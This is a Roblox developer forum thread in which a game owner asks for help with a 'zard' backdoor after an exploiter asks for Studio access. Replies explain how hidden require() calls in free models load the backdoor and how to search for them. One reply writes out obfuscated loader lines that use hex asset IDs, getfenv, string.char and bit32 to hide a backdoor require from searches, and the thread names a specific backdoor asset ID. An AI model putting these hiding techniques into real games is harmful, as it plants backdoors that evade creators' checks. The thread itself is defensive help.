Zard infection?

chyzman · August 15, 2021, 3:52am

so like an exploiter joined my game and started ruining it. He was saying my game is infected with something called “zard” and that he needs studio access in order to remove it because my game keeps “flooding the logs” the thing is he seems awfully intent on getting studio access and not very annoying about his logs being flooded. Does anyone know anything about “zard” or how to fix infections?
(sidenote i have no how to categorize this so i put it under scripting support because i think its technically a script)

johncena12345678953 · August 15, 2021, 3:53am

I believe zard is a back door exploit, look for a require(then some numbers)
its server sided

johncena12345678953 · August 15, 2021, 3:54am

you can remove it yourself dont give em access

chyzman · August 15, 2021, 3:54am

oh i already know not to give access

Pokemoncraft5290 · August 15, 2021, 3:57am

Give links to all your plugins, it might be from one of them.
Check through all free models with scripts or module scripts for the following signs:
require(number)
getfenv()
oddly formated scripts, usually all on one or 2 lines that are very long.

stick_man1112 · August 15, 2021, 3:58am

That’s kinda creepy. Just ignore em or ban em.
Search “Script” in the explorer and delete suspicious scripts.

johncena12345678953 · August 15, 2021, 3:58am

I know as a fact zard uses require.

jmt99 · August 15, 2021, 3:59am

To add on to what others above are saying:

To search for text in all scripts in your game, go to View > Find All / Replace All and search for “require” and hit enter. Look for anything suspicious and you can probably ignore anything in CoreGui.

johncena12345678953 · August 15, 2021, 3:59am

zard uses require(6972600074) i beleive

chyzman · August 15, 2021, 3:59am

4698038381
or
343254562
or
359948692

johncena12345678953 · August 15, 2021, 4:02am

2nd one is a backdoor i read comments on it i found the model for it

chyzman · August 15, 2021, 4:02am

chyzman · August 15, 2021, 4:04am

wait the second one??
that was from a model from EndorsedModel

jmt99 · August 15, 2021, 4:04am

That might be true, but I would not recommend doing a direct search like that normally because they could easily just obfuscate the asset ID to hide it from searches, for example:

require(0x19F996F0A)

would be the same as

require(6972600074)

Better to be safe and skim through all mentions of require if you know for a fact there is a backdoor virus somewhere in the game.

johncena12345678953 · August 15, 2021, 4:05am

might be first one then because last one is for adonis admin i think

chyzman · August 15, 2021, 4:07am

everyone run ITS IN THE TREES!
but srsly the obfuscated version is in the trees

chyzman · August 15, 2021, 4:11am

thanks for the help btw. I will not be sus of any scripts inside of trees
especially ones named “WELD.”

jmt99 · August 15, 2021, 4:32am

The scary thing is that my obfuscation example is also pretty basic. You can use some string.char wizardry to completely hide “require” from appearing in a search, but you have to use “getfenv”. You can also throw some binary manipulation in there by using the bit32 library:

--this black magic code:
getfenv()[string.char(114, 101, 113, 117, 105, 114, 101)](bit32.bor(bit32.lshift(0x9F99, 16), 0x6F0A)+0x100000000)

--is the same as this:
require(6972600074)

So also make sure to search for “getfenv” in Find All when looking for a virus backdoor script in your game, as well as “require”. There are ways to hide this stuff very deep in the trees

chyzman · August 15, 2021, 6:23am

why have u sent this publicly
we are all doomed